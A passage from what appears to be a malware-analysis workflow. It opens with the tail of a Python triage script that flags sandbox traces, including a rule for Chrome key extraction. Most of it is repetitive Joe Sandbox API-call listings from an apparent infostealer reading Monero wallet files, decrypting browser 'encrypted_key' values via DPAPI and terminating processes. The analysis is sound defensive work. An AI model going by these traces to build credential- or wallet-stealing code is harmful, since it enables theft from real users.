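              and (_hex(c.args[2]) or 0) & CRYPT_STRING_BASE64 for c in trace.calls)
    if wants_key and b64:
        flags.add("CHROME_KEY_EXTRACTION")
    return flags

def triage(text: str):
    """(first call-site address, sorted flags) for every function block that fired a rule."""
    out = []
    for t in parse_listing(text):
        flags = flag_trace(t)
        if flags and t.direct():
            out.append((f"{t.direct()[0].ref:08X}", sorted(flags)))
    return out
```

Subcall-inherited calls are deliberately kept in the trace but excluded from the copy/delete ordering rule: the sandbox repeats the 0057A9B0 lstrlen line under every caller, so a rule keyed on inherited calls would fire on every block that touches the path helpers rather than on the functions that actually move files.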
                            APIs
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 005699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005699EC
                              • Part of subcall function 005699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00569A11
                              • Part of subcall function 005699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00569A31
                              • Part of subcall function 005699C0: ReadFile.KERNEL32(000000FF,?,00000000,0056148F,00000000), ref: 00569A5A
                              • Part of subcall function 005699C0: LocalFree.KERNEL32(0056148F), ref: 00569A90
                              • Part of subcall function 005699C0: CloseHandle.KERNEL32(000000FF), ref: 00569A9A
                              • Part of subcall function 00578E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00578E52
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00581580,00580D92), ref: 0056F54C
                            • lstrlen.KERNEL32(00000000), ref: 0056F56B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                             • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 998311485-3310892237
                            • Opcode ID: 2261c7a9d7a92a9e4b4532d8263889233b925607dadf0f4ca530824463461fe0
                            • Instruction ID: f6d08d9dfdd8a97968f17630c47080d4e0cd6537e8d1aebdf1a6a75036bd80ac
                            • Opcode Fuzzy Hash: 2261c7a9d7a92a9e4b4532d8263889233b925607dadf0f4ca530824463461fe0
                            • Instruction Fuzzy Hash: DF51C171D101099ADB04FBB4EC5ADEE7B78BFD4300F40C528F91A67195EE346A09DBA2
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                             • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 5043fad014ee28117cb179d8df1a3e01a7a2fa9f34506089f66241ab3466d06d
                            • Instruction ID: 830f600e5c103dca3e46b875236035c0a6a7e2f6736cc036d3b86edc661fd0ee
                            • Opcode Fuzzy Hash: 5043fad014ee28117cb179d8df1a3e01a7a2fa9f34506089f66241ab3466d06d
                            • Instruction Fuzzy Hash: EC410371D10109ABCB04EFA4E845AEE7B74FF94314F10C418F51977291DB75AA09EF92
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                              • Part of subcall function 005699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005699EC
                              • Part of subcall function 005699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00569A11
                              • Part of subcall function 005699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00569A31
                              • Part of subcall function 005699C0: ReadFile.KERNEL32(000000FF,?,00000000,0056148F,00000000), ref: 00569A5A
                              • Part of subcall function 005699C0: LocalFree.KERNEL32(0056148F), ref: 00569A90
                              • Part of subcall function 005699C0: CloseHandle.KERNEL32(000000FF), ref: 00569A9A
                              • Part of subcall function 00578E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00578E52
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00569D39
                              • Part of subcall function 00569AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NV,00000000,00000000), ref: 00569AEF
                              • Part of subcall function 00569AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00564EEE,00000000,?), ref: 00569B01
                              • Part of subcall function 00569AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NV,00000000,00000000), ref: 00569B2A
                              • Part of subcall function 00569AC0: LocalFree.KERNEL32(?,?,?,?,00564EEE,00000000,?), ref: 00569B3F
                              • Part of subcall function 00569B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00569B84
                              • Part of subcall function 00569B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00569BA3
                              • Part of subcall function 00569B60: LocalFree.KERNEL32(?), ref: 00569BD3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: 7d7a788f4fd899dae7de38ea724ad2d5e2c4ad0cd0c2150fe30b71f4bc68d1d5
                            • Instruction ID: 2b107612f0dcb7a303b4fc18db1ded244e144cabe13aa2dc09b310bf12e012b4
                            • Opcode Fuzzy Hash: 7d7a788f4fd899dae7de38ea724ad2d5e2c4ad0cd0c2150fe30b71f4bc68d1d5
                            • Instruction Fuzzy Hash: 2B3101B5D1010AABDF14DFE4DC89AEFBBBCBF88304F144529E905A7241E7349A05CBA5
                            APIs
                            • memset.MSVCRT ref: 005794EB
                              • Part of subcall function 00578D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0057951E,00000000), ref: 00578D5B
                              • Part of subcall function 00578D50: RtlAllocateHeap.NTDLL(00000000), ref: 00578D62
                              • Part of subcall function 00578D50: wsprintfW.USER32 ref: 00578D78
                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 005795AB
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 005795C9
                            • CloseHandle.KERNEL32(00000000), ref: 005795D6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                            • String ID:
                            • API String ID: 3729781310-0
                            • Opcode ID: 90590247072bf62ce360ea1e055735496f3079bea5683f645869912a36365e2b
                            • Instruction ID: 149647bc28ec40841099482fa95e51df3f832c1b0dfbdcf1341cdba1820fa151
                            • Opcode Fuzzy Hash: 90590247072bf62ce360ea1e055735496f3079bea5683f645869912a36365e2b
                            • Instruction Fuzzy Hash: 77314D71E00218AFDB15DFD0DC49BEDBB78FF84300F108459E50AAB184DB78AA89DB52
                            APIs
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,005805B7), ref: 005786CA
                            • Process32First.KERNEL32(?,00000128), ref: 005786DE
                            • Process32Next.KERNEL32(?,00000128), ref: 005786F3
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                            • CloseHandle.KERNEL32(?), ref: 00578761
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 12b59eb6cb0e68ef779dd4853ddf0970b2aa92c29ae788b9f590546ef0e81405
                            • Instruction ID: 0138638f263897c133fc8a219451c92ab9bca603a5fafeff443b30d102bcf879
                            • Opcode Fuzzy Hash: 12b59eb6cb0e68ef779dd4853ddf0970b2aa92c29ae788b9f590546ef0e81405
                            • Instruction Fuzzy Hash: 78316F71901119ABCB24EF55EC49FEEBB78FF85700F108199E50EA2190DB346A45DFA2
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00580E00,00000000,?), ref: 005779B0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 005779B7
                            • GetLocalTime.KERNEL32(?,?,?,?,?,00580E00,00000000,?), ref: 005779C4
                            • wsprintfA.USER32 ref: 005779F3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 642de8820540c194ceb3232431c5a3a7b316c4d001c2ce2420322b0c3d92ed3a
                            • Instruction ID: 77fb60db98b35624c7537dc06dc3b5d1579d400a495860e40f5b4767ac8f4747
                            • Opcode Fuzzy Hash: 642de8820540c194ceb3232431c5a3a7b316c4d001c2ce2420322b0c3d92ed3a
                            • Instruction Fuzzy Hash: 9E1118B2904118AACB149FC9ED45BBEBBF8FB4DB11F10811AF605A2280D33D5940DBB5
                            APIs
                              • Part of subcall function 00578DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00578E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 0057508A
                            • lstrcat.KERNEL32(?,00E4E428), ref: 005750A8
                              • Part of subcall function 00574910: wsprintfA.USER32 ref: 0057492C
                              • Part of subcall function 00574910: FindFirstFileA.KERNEL32(?,?), ref: 00574943
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                            • String ID: ($
                            • API String ID: 2699682494-3146928370
                            • Opcode ID: fbdaf9c1fa94683ee861b2fbc53a37b2d02ac2cb8cd8784c7e08a6872aecfd19
                            • Instruction ID: e6dfa6875a6204edc579255b347e101ed2e853fbd0314ceabc6017ac978e8a31
                            • Opcode Fuzzy Hash: fbdaf9c1fa94683ee861b2fbc53a37b2d02ac2cb8cd8784c7e08a6872aecfd19
                            • Instruction Fuzzy Hash: E401847690020867C794FB60EC4AEFE773CBBE5300F008554B65A96191EF749AC8DFA6
                            APIs
                            • __getptd.LIBCMT ref: 0057C74E
                              • Part of subcall function 0057BF9F: __amsg_exit.LIBCMT ref: 0057BFAF
                            • __getptd.LIBCMT ref: 0057C765
                            • __amsg_exit.LIBCMT ref: 0057C773
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0057C797
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 1f8e891650e38898511139c197476a6e0bb42d13fe531ecad285a2e385377411
                            • Instruction ID: e2c6011679cdc75cff2074becc5bed9ab3e313ed28906aef817a0129f9791ef9
                            • Opcode Fuzzy Hash: 1f8e891650e38898511139c197476a6e0bb42d13fe531ecad285a2e385377411
                            • Instruction Fuzzy Hash: FBF06D329006029BE724BBB8784EB5D3FA0BF80B20F20C14DF40CA62D2DF645940BF56
                            APIs
                              • Part of subcall function 00578DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00578E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00574F7A
                            • lstrcat.KERNEL32(?,00581070), ref: 00574F97
                            • lstrcat.KERNEL32(?,00E48F78), ref: 00574FAB
                            • lstrcat.KERNEL32(?,00581074), ref: 00574FBD
                              • Part of subcall function 00574910: wsprintfA.USER32 ref: 0057492C
                              • Part of subcall function 00574910: FindFirstFileA.KERNEL32(?,?), ref: 00574943
                              • Part of subcall function 00574910: StrCmpCA.SHLWAPI(?,00580FDC), ref: 00574971
                              • Part of subcall function 00574910: StrCmpCA.SHLWAPI(?,00580FE0), ref: 00574987
                              • Part of subcall function 00574910: FindNextFileA.KERNEL32(000000FF,?), ref: 00574B7D
                              • Part of subcall function 00574910: FindClose.KERNEL32(000000FF), ref: 00574B92
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: fb8a6b214fcd72a12906b09728ec93565c02191835645678dbfc02529ffe22dc
                            • Instruction ID: 0a4d468d7039952217d785a19498cd4830426e40f3c88711fffb4552901df1b9
                            • Opcode Fuzzy Hash: fb8a6b214fcd72a12906b09728ec93565c02191835645678dbfc02529ffe22dc
                            • Instruction Fuzzy Hash: 20217476900209A7C794FBA0EC4AEED773CBBD5300F008554B65A96181EF789AC9CF96